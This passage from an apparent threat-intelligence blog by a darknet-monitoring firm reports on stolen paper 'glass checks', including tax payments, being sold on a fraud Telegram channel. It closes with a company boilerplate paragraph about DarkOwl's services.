The screenshots of the ‘glass check’ examples below are two of dozens we found on a popular fraud Telegram channel. Many paper checks included payments to the IRS or the state revenue departments for thousands of dollars in value.
The sale value of the check is directly proportional to the value of the check itself, with a $2,000+ tax payment check selling for more than twice as much as the $843 USD one. Some of the checks also included the signer’s social security number in the memo line, which could be used for additional identity theft and fraud. We’ve intentionally obfuscated any identifying information for the checks we included here, but the dates and check payment amounts are clearly visible.
Sample Glass Checks for Sale (Source: Telegram)
DarkOwl is a Denver-based company that provides the world’s largest index of darknet content and the tools to efficiently find leaked or otherwise compromised sensitive data. We shorten the timeframe to detection of compromised data on the darknet, empowering organizations to swiftly detect security gaps and mitigate damage prior to misuse of their data.